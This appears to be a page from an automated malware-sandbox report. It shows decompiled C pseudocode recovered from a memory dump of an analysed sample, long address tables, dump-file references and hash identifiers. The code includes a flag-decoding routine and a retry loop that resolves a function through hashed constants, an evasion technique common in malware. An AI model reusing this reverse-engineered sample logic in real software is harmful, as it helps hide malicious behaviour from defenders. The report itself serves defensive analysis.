                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      										if((_t343 & 0x00000010) == 0) {
                                                                                                                                      											if((_t343 & 0x00000008) == 0) {
                                                                                                                                      												_t397 = _t427[0x10];
                                                                                                                                      												_t343 = _t343 | 0x00000008;
                                                                                                                                      												 *(_t397 + 0x18) = _t343;
                                                                                                                                      												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
                                                                                                                                      												L128:
                                                                                                                                      												_t274 =  &(_t274[1]);
                                                                                                                                      												goto L129;
                                                                                                                                      											}
                                                                                                                                      											_t398 = _t427[0x10];
                                                                                                                                      											_t343 = _t343 | 0x00000800;
                                                                                                                                      											L126:
                                                                                                                                      											 *(_t398 + 0x18) = _t343;
                                                                                                                                      											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
                                                                                                                                      											goto L128;
                                                                                                                                      										}
                                                                                                                                      										_t398 = _t427[0x10];
                                                                                                                                      										_t343 = _t343 | 0x00000008;
                                                                                                                                      										goto L126;
                                                                                                                                      									}
                                                                                                                                      									if(_t292 == 0) {
                                                                                                                                      										if(( *_t427 & 0x00000008) == 0) {
                                                                                                                                      											_t399 = _t427[0x10];
                                                                                                                                      											_t343 = _t343 | 0x00000010;
                                                                                                                                      											 *(_t399 + 0x18) = _t343;
                                                                                                                                      											_t260 =  *_t274;
                                                                                                                                      											_t274 =  &(_t274[2]);
                                                                                                                                      											 *(_t399 + 0x10) = _t260;
                                                                                                                                      										} else {
                                                                                                                                      											_t400 = _t427[0x10];
                                                                                                                                      											_t343 = _t343 | 0x00000008;
                                                                                                                                      											 *(_t400 + 0x18) = _t343;
                                                                                                                                      											_t261 =  *_t274 & 0x0000ffff;
                                                                                                                                      											_t274 =  &(_t274[1]);
                                                                                                                                      											 *(_t400 + 0x10) = _t261;
                                                                                                                                      										}
                                                                                                                                      										goto L121;
                                                                                                                                      									}
                                                                                                                                      									if(( *_t427 & 0x00000008) == 0) {
                                                                                                                                      										goto L132;
                                                                                                                                      									}
                                                                                                                                      									_t295 = _t427[0x10];
                                                                                                                                      									_t343 = _t343 | 0x00000108;
                                                                                                                                      									 *(_t295 + 0x18) = _t343;
                                                                                                                                      									_t262 =  *_t274 & 0x0000ffff;
                                                                                                                                      									_t274 =  &(_t274[1]);
                                                                                                                                      									 *(_t295 + 0x10) = _t262;
                                                                                                                                      									goto L135;
                                                                                                                                      								}
                                                                                                                                      								L86:
                                                                                                                                      								_t343 = _t343 | 0x00011000;
                                                                                                                                      								 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                      								goto L87;
                                                                                                                                      							}
                                                                                                                                      							if(_t250 != 0x8e) {
                                                                                                                                      								L66:
                                                                                                                                      								if(_t427[3] != 3) {
                                                                                                                                      									if(_t427[5] == 0) {
                                                                                                                                      										goto L87;
                                                                                                                                      									}
                                                                                                                                      									if(_t250 == 0xd7 || _t250 == 0xf7) {
                                                                                                                                      										L83:
                                                                                                                                      										if(( *_t427 & 0x00000009) != 0) {
                                                                                                                                      											goto L86;
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										if(_t250 == 0xd6) {
                                                                                                                                      											if(( *_t427 & 0x00000006) != 0) {
                                                                                                                                      												goto L86;
                                                                                                                                      											}
                                                                                                                                      											goto L87;
                                                                                                                                      										}
                                                                                                                                      										if(_t250 == 0xc5) {
                                                                                                                                      											goto L86;
                                                                                                                                      										}
                                                                                                                                      										if(_t250 == 0x50) {
                                                                                                                                      											goto L83;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									goto L87;
                                                                                                                                      								}
                                                                                                                                      								_t364 = _t427[4];
                                                                                                                                      								_t312 = _t364 + 0x1da;
                                                                                                                                      								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
                                                                                                                                      								_t313 =  !=  ? _t427[9] + _t364 : _t312;
                                                                                                                                      								_t427[4] = _t366;
                                                                                                                                      								if(_t366 == _t313) {
                                                                                                                                      									goto L87;
                                                                                                                                      								} else {
                                                                                                                                      									goto L68;
                                                                                                                                      								}
                                                                                                                                      								while(1) {
                                                                                                                                      									L68:
                                                                                                                                      									_t408 = _t427[4];
                                                                                                                                      									if(_t250 ==  *_t408) {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									_t411 = _t408 + 3;
                                                                                                                                      									_t427[4] = _t411;
                                                                                                                                      									if(_t411 != _t313) {
                                                                                                                                      										continue;
                                                                                                                                      									}
                                                                                                                                      									goto L87;
                                                                                                                                      								}
                                                                                                                                      								_t314 = _t408;
                                                                                                                                      								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
                                                                                                                                      									goto L87;
                                                                                                                                      								}
                                                                                                                                      								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
                                                                                                                                      									goto L86;
                                                                                                                                      								}
                                                                                                                                      								goto L87;
                                                                                                                                      							}
                                                                                                                                      							if(_t427[2] == 1) {
                                                                                                                                      								goto L86;
                                                                                                                                      							}
                                                                                                                                      							goto L85;
                                                                                                                                      						}
                                                                                                                                      						if(_t250 == 0x20 || _t250 == 0x22) {
                                                                                                                                      							_t316 = 3;
                                                                                                                                      							_t427[3] = _t316;
                                                                                                                                      							if(_t427[2] > 4 || _t427[2] == 1) {
                                                                                                                                      								goto L86;
                                                                                                                                      							} else {
                                                                                                                                      								goto L87;
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							if(_t250 == 0x21 || _t250 == 0x23) {
                                                                                                                                      								_t319 = 3;
                                                                                                                                      								_t427[3] = _t319;
                                                                                                                                      								if((_t427[6] & 0xfffffff0) == 0x20) {
                                                                                                                                      									goto L86;
                                                                                                                                      								}
                                                                                                                                      								goto L87;
                                                                                                                                      							} else {
                                                                                                                                      								goto L66;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					if(_t427[3] == 3) {
                                                                                                                                      						L51:
                                                                                                                                      						_t343 = _t343 | 0x00009000;
                                                                                                                                      						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                      						goto L52;
                                                                                                                                      					}
                                                                                                                                      					_t412 = _t427[4];
                                                                                                                                      					_t321 = _t250;
                                                                                                                                      					_t427[8] = _t412 + 0x1b9;
                                                                                                                                      					if(_t427[5] == 0) {
                                                                                                                                      						_t413 = _t412 + 0x1a1;
                                                                                                                                      						_t321 = _t250 & 0x000000fe;
                                                                                                                                      					} else {
                                                                                                                                      						_t413 = _t427[8];
                                                                                                                                      						_t427[8] = _t412 + 0x1cb;
                                                                                                                                      					}
                                                                                                                                      					while(_t413 != _t427[8]) {
                                                                                                                                      						if(_t321 ==  *_t413) {
                                                                                                                                      							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
                                                                                                                                      								goto L52;
                                                                                                                                      							}
                                                                                                                                      							goto L51;
                                                                                                                                      						}
                                                                                                                                      						_t413 = _t413 + 2;
                                                                                                                                      					}
                                                                                                                                      					goto L51;
                                                                                                                                      				}
                                                                                                                                      			}






































































                                                                                                                                      0x732392e3
                                                                                                                                      0x732392e7
                                                                                                                                      0x732392f3
                                                                                                                                      0x732392f7
                                                                                                                                      0x732392fb
                                                                                                                                      0x73239300
                                                                                                                                      0x73239303
                                                                                                                                      0x73239305
                                                                                                                                      0x73239307
                                                                                                                                      0x73239307
                                                                                                                                      0x7323930a
                                                                                                                                      0x73239310
                                                                                                                                      0x73239388
                                                                                                                                      0x7323938c
                                                                                                                                      0x7323938f
                                                                                                                                      0x7323938f
                                                                                                                                      0x73239392
                                                                                                                                      0x00000000
                                                                                                                                      0x73239392
                                                                                                                                      0x73239317
                                                                                                                                      0x7323937f
                                                                                                                                      0x73239383
                                                                                                                                      0x00000000
                                                                                                                                      0x73239383
                                                                                                                                      0x7323931e
                                                                                                                                      0x73239377
                                                                                                                                      0x7323937a
                                                                                                                                      0x00000000
                                                                                                                                      0x7323937a
                                                                                                                                      0x73239323
                                                                                                                                      0x73239361
                                                                                                                                      0x73239368
                                                                                                                                      0x7323936b
                                                                                                                                      0x73239334
                                                                                                                                      0x73239334
                                                                                                                                      0x7323933a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7323933f
                                                                                                                                      0x73239359
                                                                                                                                      0x7323935c
                                                                                                                                      0x00000000
                                                                                                                                      0x7323935c
                                                                                                                                      0x73239344
                                                                                                                                      0x00000000
                                                                                                                                      0x73239346
                                                                                                                                      0x7323934a
                                                                                                                                      0x7323934d
                                                                                                                                      0x00000000
                                                                                                                                      0x7323934d
                                                                                                                                      0x73239344
                                                                                                                                      0x73239395
                                                                                                                                      0x73239395
                                                                                                                                      0x73239395
                                                                                                                                      0x7323939e
                                                                                                                                      0x732393a7
                                                                                                                                      0x732393aa
                                                                                                                                      0x732393ad
                                                                                                                                      0x732393b0
                                                                                                                                      0x732393b3
                                                                                                                                      0x732393b9
                                                                                                                                      0x732393fb
                                                                                                                                      0x732393fe
                                                                                                                                      0x732393ff
                                                                                                                                      0x73239406
                                                                                                                                      0x73239409
                                                                                                                                      0x732393bb
                                                                                                                                      0x732393bf
                                                                                                                                      0x732393c9
                                                                                                                                      0x732393d0
                                                                                                                                      0x732393d2
                                                                                                                                      0x732393eb
                                                                                                                                      0x732393ee
                                                                                                                                      0x732393ee
                                                                                                                                      0x732393d0
                                                                                                                                      0x73239411
                                                                                                                                      0x73239414
                                                                                                                                      0x73239417
                                                                                                                                      0x7323941b
                                                                                                                                      0x7323941f
                                                                                                                                      0x73239429
                                                                                                                                      0x7323942d
                                                                                                                                      0x73239437
                                                                                                                                      0x73239440
                                                                                                                                      0x7323944d
                                                                                                                                      0x73239450
                                                                                                                                      0x73239453
                                                                                                                                      0x73239453
                                                                                                                                      0x7323945f
                                                                                                                                      0x7323946a
                                                                                                                                      0x73239470
                                                                                                                                      0x73239474
                                                                                                                                      0x73239461
                                                                                                                                      0x73239461
                                                                                                                                      0x73239461
                                                                                                                                      0x7323947c
                                                                                                                                      0x732394a6
                                                                                                                                      0x732394ac
                                                                                                                                      0x732394ac
                                                                                                                                      0x732394b4
                                                                                                                                      0x7323985d
                                                                                                                                      0x73239863
                                                                                                                                      0x73239869
                                                                                                                                      0x73239869
                                                                                                                                      0x00000000
                                                                                                                                      0x732394ba
                                                                                                                                      0x732394ba
                                                                                                                                      0x732394be
                                                                                                                                      0x732394c1
                                                                                                                                      0x732394c4
                                                                                                                                      0x732394c7
                                                                                                                                      0x732394cb
                                                                                                                                      0x732394cd
                                                                                                                                      0x732394d0
                                                                                                                                      0x732394d3
                                                                                                                                      0x732394d7
                                                                                                                                      0x732394dc
                                                                                                                                      0x732394df
                                                                                                                                      0x732394e3
                                                                                                                                      0x732394e8
                                                                                                                                      0x732394eb
                                                                                                                                      0x732394ed
                                                                                                                                      0x732394f0
                                                                                                                                      0x732394f4
                                                                                                                                      0x732394f9
                                                                                                                                      0x73239509
                                                                                                                                      0x7323950f
                                                                                                                                      0x7323950f
                                                                                                                                      0x73239517
                                                                                                                                      0x73239519
                                                                                                                                      0x73239522
                                                                                                                                      0x73239524
                                                                                                                                      0x73239527
                                                                                                                                      0x73239532
                                                                                                                                      0x7323955f
                                                                                                                                      0x73239534
                                                                                                                                      0x7323954b
                                                                                                                                      0x7323954b
                                                                                                                                      0x73239567
                                                                                                                                      0x7323956d
                                                                                                                                      0x73239573
                                                                                                                                      0x73239573
                                                                                                                                      0x73239567
                                                                                                                                      0x73239522
                                                                                                                                      0x7323957a
                                                                                                                                      0x732395eb
                                                                                                                                      0x732395f0
                                                                                                                                      0x73239649
                                                                                                                                      0x7323970b
                                                                                                                                      0x73239710
                                                                                                                                      0x7323971f
                                                                                                                                      0x73239725
                                                                                                                                      0x73239729
                                                                                                                                      0x73239732
                                                                                                                                      0x73239739
                                                                                                                                      0x73239742
                                                                                                                                      0x73239750
                                                                                                                                      0x73239753
                                                                                                                                      0x7323973b
                                                                                                                                      0x7323973b
                                                                                                                                      0x7323973b
                                                                                                                                      0x73239739
                                                                                                                                      0x7323975c
                                                                                                                                      0x73239789
                                                                                                                                      0x7323979c
                                                                                                                                      0x732397a4
                                                                                                                                      0x7323978b
                                                                                                                                      0x7323978d
                                                                                                                                      0x73239795
                                                                                                                                      0x73239795
                                                                                                                                      0x7323975e
                                                                                                                                      0x73239763
                                                                                                                                      0x73239782
                                                                                                                                      0x73239765
                                                                                                                                      0x7323976a
                                                                                                                                      0x7323977b
                                                                                                                                      0x7323976c
                                                                                                                                      0x7323976c
                                                                                                                                      0x7323976c
                                                                                                                                      0x7323976a
                                                                                                                                      0x73239763
                                                                                                                                      0x732397ac
                                                                                                                                      0x732397bb
                                                                                                                                      0x732397c8
                                                                                                                                      0x732397d1
                                                                                                                                      0x732397d5
                                                                                                                                      0x732397d9
                                                                                                                                      0x732397dc
                                                                                                                                      0x732397df
                                                                                                                                      0x732397e2
                                                                                                                                      0x732397e5
                                                                                                                                      0x732397e8
                                                                                                                                      0x732397ee
                                                                                                                                      0x732397f2
                                                                                                                                      0x732397f8
                                                                                                                                      0x732397f8
                                                                                                                                      0x732397ee
                                                                                                                                      0x732397fe
                                                                                                                                      0x7323983b
                                                                                                                                      0x7323983f
                                                                                                                                      0x73239846
                                                                                                                                      0x7323984c
                                                                                                                                      0x73239800
                                                                                                                                      0x73239803
                                                                                                                                      0x73239823
                                                                                                                                      0x73239827
                                                                                                                                      0x7323982e
                                                                                                                                      0x73239835
                                                                                                                                      0x73239805
                                                                                                                                      0x73239808
                                                                                                                                      0x7323980a
                                                                                                                                      0x7323980e
                                                                                                                                      0x73239818
                                                                                                                                      0x7323981e
                                                                                                                                      0x7323981e
                                                                                                                                      0x73239808
                                                                                                                                      0x73239803
                                                                                                                                      0x73239853
                                                                                                                                      0x73239853
                                                                                                                                      0x7323986c
                                                                                                                                      0x7323986c
                                                                                                                                      0x73239872
                                                                                                                                      0x73239877
                                                                                                                                      0x732398d1
                                                                                                                                      0x732398d6
                                                                                                                                      0x73239915
                                                                                                                                      0x7323991a
                                                                                                                                      0x7323991c
                                                                                                                                      0x73239920
                                                                                                                                      0x73239923
                                                                                                                                      0x73239926
                                                                                                                                      0x73239928
                                                                                                                                      0x73239929
                                                                                                                                      0x73239929
                                                                                                                                      0x7323992e
                                                                                                                                      0x7323994c
                                                                                                                                      0x7323994e
                                                                                                                                      0x73239952
                                                                                                                                      0x73239958
                                                                                                                                      0x7323995b
                                                                                                                                      0x7323995d
                                                                                                                                      0x7323995e
                                                                                                                                      0x7323995e
                                                                                                                                      0x00000000
                                                                                                                                      0x73239930
                                                                                                                                      0x73239930
                                                                                                                                      0x73239930
                                                                                                                                      0x73239934
                                                                                                                                      0x7323993a
                                                                                                                                      0x7323993d
                                                                                                                                      0x7323993f
                                                                                                                                      0x73239942
                                                                                                                                      0x73239961
                                                                                                                                      0x73239961
                                                                                                                                      0x73239968
                                                                                                                                      0x73239982
                                                                                                                                      0x7323996a
                                                                                                                                      0x7323996a
                                                                                                                                      0x73239976
                                                                                                                                      0x73239977
                                                                                                                                      0x7323997a
                                                                                                                                      0x7323997a
                                                                                                                                      0x73239990
                                                                                                                                      0x73239990
                                                                                                                                      0x7323992e
                                                                                                                                      0x732398db
                                                                                                                                      0x732398e9
                                                                                                                                      0x73239901
                                                                                                                                      0x73239905
                                                                                                                                      0x73239908
                                                                                                                                      0x7323990e
                                                                                                                                      0x73239912
                                                                                                                                      0x73239912
                                                                                                                                      0x00000000
                                                                                                                                      0x73239912
                                                                                                                                      0x732398eb
                                                                                                                                      0x732398ef
                                                                                                                                      0x732398f5
                                                                                                                                      0x732398f5
                                                                                                                                      0x732398fb
                                                                                                                                      0x00000000
                                                                                                                                      0x732398fb
                                                                                                                                      0x732398dd
                                                                                                                                      0x732398e1
                                                                                                                                      0x00000000
                                                                                                                                      0x732398e1
                                                                                                                                      0x7323987b
                                                                                                                                      0x732398a7
                                                                                                                                      0x732398bf
                                                                                                                                      0x732398c3
                                                                                                                                      0x732398c6
                                                                                                                                      0x732398c9
                                                                                                                                      0x732398cb
                                                                                                                                      0x732398ce
                                                                                                                                      0x732398a9
                                                                                                                                      0x732398a9
                                                                                                                                      0x732398ad
                                                                                                                                      0x732398b0
                                                                                                                                      0x732398b3
                                                                                                                                      0x732398b6
                                                                                                                                      0x732398b9
                                                                                                                                      0x732398b9
                                                                                                                                      0x00000000
                                                                                                                                      0x732398a7
                                                                                                                                      0x73239881
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73239887
                                                                                                                                      0x7323988b
                                                                                                                                      0x73239891
                                                                                                                                      0x73239894
                                                                                                                                      0x73239897
                                                                                                                                      0x7323989a
                                                                                                                                      0x00000000
                                                                                                                                      0x7323989a
                                                                                                                                      0x73239712
                                                                                                                                      0x73239716
                                                                                                                                      0x7323971c
                                                                                                                                      0x00000000
                                                                                                                                      0x7323971c
                                                                                                                                      0x73239654
                                                                                                                                      0x73239666
                                                                                                                                      0x7323966b
                                                                                                                                      0x732396d6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732396dd
                                                                                                                                      0x73239703
                                                                                                                                      0x73239707
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732396e6
                                                                                                                                      0x732396eb
                                                                                                                                      0x732396ff
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73239701
                                                                                                                                      0x732396f2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732396f7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732396f9
                                                                                                                                      0x00000000
                                                                                                                                      0x732396dd
                                                                                                                                      0x7323966d
                                                                                                                                      0x73239677
                                                                                                                                      0x73239688
                                                                                                                                      0x7323968b
                                                                                                                                      0x7323968e
                                                                                                                                      0x73239694
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7323969a
                                                                                                                                      0x7323969a
                                                                                                                                      0x7323969a
                                                                                                                                      0x732396a1
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732396a3
                                                                                                                                      0x732396a6
                                                                                                                                      0x732396ac
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732396ae
                                                                                                                                      0x732396b0
                                                                                                                                      0x732396b9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732396cd
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732396cf
                                                                                                                                      0x7323965b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73239661
                                                                                                                                      0x732395f5
                                                                                                                                      0x73239624
                                                                                                                                      0x73239625
                                                                                                                                      0x7323962e
                                                                                                                                      0x00000000
                                                                                                                                      0x7323963f
                                                                                                                                      0x00000000
                                                                                                                                      0x7323963f
                                                                                                                                      0x732395fc
                                                                                                                                      0x732395ff
                                                                                                                                      0x73239612
                                                                                                                                      0x73239613
                                                                                                                                      0x73239617
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732395ff
                                                                                                                                      0x732395f5
                                                                                                                                      0x73239581
                                                                                                                                      0x732395de
                                                                                                                                      0x732395e2
                                                                                                                                      0x732395e8
                                                                                                                                      0x00000000
                                                                                                                                      0x732395e8
                                                                                                                                      0x73239583
                                                                                                                                      0x73239587
                                                                                                                                      0x73239594
                                                                                                                                      0x73239598
                                                                                                                                      0x732395ae
                                                                                                                                      0x732395b6
                                                                                                                                      0x7323959a
                                                                                                                                      0x7323959c
                                                                                                                                      0x732395a6
                                                                                                                                      0x732395a6
                                                                                                                                      0x732395bc
                                                                                                                                      0x732395c5
                                                                                                                                      0x732395dc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732395dc
                                                                                                                                      0x732395c7
                                                                                                                                      0x732395c7
                                                                                                                                      0x00000000
                                                                                                                                      0x732395bc

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
                                                                                                                                      • Instruction ID: de2e39c999ef282145428c7d4bbd4731bcccaf3226c1c84da5b30cc9734c7794
                                                                                                                                      • Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
                                                                                                                                      • Instruction Fuzzy Hash: B2228BB040839A8BE715CF15C49136ABBF1FF87300F68886EE9D64B2D5D3359985CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                      			E732284E4(signed int __ecx, intOrPtr __edx) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				signed int* _t173;
                                                                                                                                      				signed int _t178;
                                                                                                                                      				void* _t180;
                                                                                                                                      				void* _t181;
                                                                                                                                      				intOrPtr* _t188;
                                                                                                                                      				signed int _t202;
                                                                                                                                      				intOrPtr* _t211;
                                                                                                                                      				intOrPtr* _t212;
                                                                                                                                      				intOrPtr* _t217;
                                                                                                                                      				signed int _t218;
                                                                                                                                      				void* _t219;
                                                                                                                                      				void* _t220;
                                                                                                                                      				void* _t237;
                                                                                                                                      				void* _t238;
                                                                                                                                      				signed int* _t246;
                                                                                                                                      				void* _t247;
                                                                                                                                      				signed int* _t258;
                                                                                                                                      				intOrPtr* _t269;
                                                                                                                                      				signed int* _t277;
                                                                                                                                      				intOrPtr* _t279;
                                                                                                                                      				void* _t283;
                                                                                                                                      				void* _t285;
                                                                                                                                      				void* _t287;
                                                                                                                                      				signed int _t296;
                                                                                                                                      				void* _t299;
                                                                                                                                      				signed int* _t308;
                                                                                                                                      				intOrPtr* _t310;
                                                                                                                                      				signed int _t316;
                                                                                                                                      				intOrPtr _t318;
                                                                                                                                      				signed int* _t324;
                                                                                                                                      				signed int _t325;
                                                                                                                                      				signed int _t326;
                                                                                                                                      				void* _t345;
                                                                                                                                      				void* _t416;
                                                                                                                                      				signed int _t417;
                                                                                                                                      				signed int _t424;
                                                                                                                                      				signed int _t432;
                                                                                                                                      				intOrPtr* _t433;
                                                                                                                                      				intOrPtr* _t434;
                                                                                                                                      				signed int _t437;
                                                                                                                                      				signed int _t441;
                                                                                                                                      				signed int _t445;
                                                                                                                                      				signed int _t446;
                                                                                                                                      				signed int _t447;
                                                                                                                                      				signed int _t450;
                                                                                                                                      				void* _t451;
                                                                                                                                      				signed int _t452;
                                                                                                                                      				void* _t453;
                                                                                                                                      				signed int _t454;
                                                                                                                                      				void* _t457;
                                                                                                                                      				intOrPtr* _t458;
                                                                                                                                      
                                                                                                                                      				_push(_t435);
                                                                                                                                      				_t458 = _t457 - 0xa4;
                                                                                                                                      				 *_t458 = __ecx + 0x1c;
                                                                                                                                      				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
                                                                                                                                      				 *(_t458 + 4) = __ecx;
                                                                                                                                      				 *(_t458 + 0x84) = 0;
                                                                                                                                      				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
                                                                                                                                      				while(1) {
                                                                                                                                      					_t415 =  *(_t458 + 0x6c);
                                                                                                                                      					E7322B714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
                                                                                                                                      					if(E7322F56C(_t458 + 0x24) == 0) {
                                                                                                                                      						goto L3;
                                                                                                                                      					} else {
                                                                                                                                      						 *( *(_t458 + 4) + 0x2c) = 0;
                                                                                                                                      						E7322F6F0(_t458 + 0x24);
                                                                                                                                      					}
                                                                                                                                      					L60:
                                                                                                                                      					_t318 = 0xffffffffffffffff;
                                                                                                                                      					L62:
                                                                                                                                      					if(_t318 != 0) {
                                                                                                                                      						L65:
                                                                                                                                      						return _t318;
                                                                                                                                      					} else {
                                                                                                                                      						if( *(_t458 + 0x84) != 0x20) {
                                                                                                                                      							E7323218C(0x5dc, _t415, _t435);
                                                                                                                                      							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
                                                                                                                                      							continue;
                                                                                                                                      						} else {
                                                                                                                                      							_t318 = 0xffffffffffffffff;
                                                                                                                                      							goto L65;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					L71:
                                                                                                                                      					L3:
                                                                                                                                      					__eflags =  *( *(_t458 + 4));
                                                                                                                                      					if( *( *(_t458 + 4)) > 0) {
                                                                                                                                      						_t326 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						do {
                                                                                                                                      							 *(_t458 + 0x64) = _t326 * 4;
                                                                                                                                      							_t434 = E7322F558( *(_t458 + 0x7c), _t326 * 4);
                                                                                                                                      							_t435 =  *(_t458 + 0x20);
                                                                                                                                      							__eflags = _t435;
                                                                                                                                      							if(_t435 <= 0) {
                                                                                                                                      								L11:
                                                                                                                                      								_t435 =  *(_t458 + 4) + 4;
                                                                                                                                      								_t283 = E7322F568( *(_t458 + 4) + 4);
                                                                                                                                      								__eflags = _t283 -  *(_t458 + 0x64);
                                                                                                                                      								if(_t283 >  *(_t458 + 0x64)) {
                                                                                                                                      									_t451 = 4 + _t326 * 4;
                                                                                                                                      									_t299 = E7322F568(_t435);
                                                                                                                                      									__eflags = _t299 - _t451;
                                                                                                                                      									if(_t299 > _t451) {
                                                                                                                                      										 *((intOrPtr*)(_t458 + 0x9c)) = E7322F558(_t435,  *(_t458 + 0x64));
                                                                                                                                      										 *((intOrPtr*)(_t458 + 0x98)) = E7322F558(_t435, _t451);
                                                                                                                                      										E7323382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E7322F568(_t435) - _t451);
                                                                                                                                      										_t458 = _t458 + 0xc;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4(_t435, E7322F568(_t435) + 0xfffffffc);
                                                                                                                                      									_t308 =  *(_t458 + 4);
                                                                                                                                      									 *_t308 =  *_t308 - 1;
                                                                                                                                      									__eflags =  *_t308;
                                                                                                                                      								}
                                                                                                                                      								_t450 = E73232F8C(0xa5eabdf8, 0x2c2324e8);
                                                                                                                                      								__eflags = _t450;
                                                                                                                                      								if(_t450 != 0) {
                                                                                                                                      									 *_t450( *(E7322F558( *(_t458 + 4),  *(_t458 + 0x64))));
                                                                                                                                      								}
                                                                                                                                      								_t285 = E7322F568( *_t458);
                                                                                                                                      								__eflags = _t285 -  *(_t458 + 0x64);
                                                                                                                                      								if(_t285 >  *(_t458 + 0x64)) {
                                                                                                                                      									_t453 = 4 + _t326 * 4;
                                                                                                                                      									_t287 = E7322F568( *_t458);
                                                                                                                                      									__eflags = _t287 - _t453;
                                                                                                                                      									if(_t287 > _t453) {
                                                                                                                                      										_t435 = E7322F558( *(_t458 + 4),  *(_t458 + 0x64));
                                                                                                                                      										 *((intOrPtr*)(_t458 + 0xa0)) = E7322F558( *(_t458 + 4), _t453);
                                                                                                                                      										E7323382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E7322F568( *_t458) - _t453);
                                                                                                                                      										_t458 = _t458 + 0xc;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4( *(_t458 + 4), E7322F568( *_t458) + 0xfffffffc);
                                                                                                                                      									_t296 =  *(_t458 + 4);
                                                                                                                                      									_t33 = _t296 + 0x18;
                                                                                                                                      									 *_t33 =  *(_t296 + 0x18) - 1;
                                                                                                                                      									__eflags =  *_t33;
                                                                                                                                      								}
                                                                                                                                      								_t326 = _t326 - 1;
                                                                                                                                      								__eflags = _t326;
                                                                                                                                      							} else {
                                                                                                                                      								_t452 = 0;
                                                                                                                                      								__eflags = 0;
                                                                                                                                      								while(1) {
                                                                                                                                      									_t310 = E7322F558(_t458 + 0x28, _t452 * 4);
                                                                                                                                      									__eflags =  *_t310 -  *_t434;
                                                                                                                                      									if( *_t310 ==  *_t434) {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									_t452 = _t452 + 1;
                                                                                                                                      									__eflags = _t452 - _t435;
                                                                                                                                      									if(_t452 < _t435) {
                                                                                                                                      										continue;
                                                                                                                                      									} else {
                                                                                                                                      										goto L11;
                                                                                                                                      									}
                                                                                                                                      									goto L20;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t452 - 0xffffffff;
                                                                                                                                      								if(_t452 == 0xffffffff) {
                                                                                                                                      									goto L11;
                                                                                                                                      								} else {
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							L20:
                                                                                                                                      							_t326 = _t326 + 1;
                                                                                                                                      							__eflags = _t326 -  *( *(_t458 + 4));
                                                                                                                                      						} while (_t326 <  *( *(_t458 + 4)));
                                                                                                                                      					}
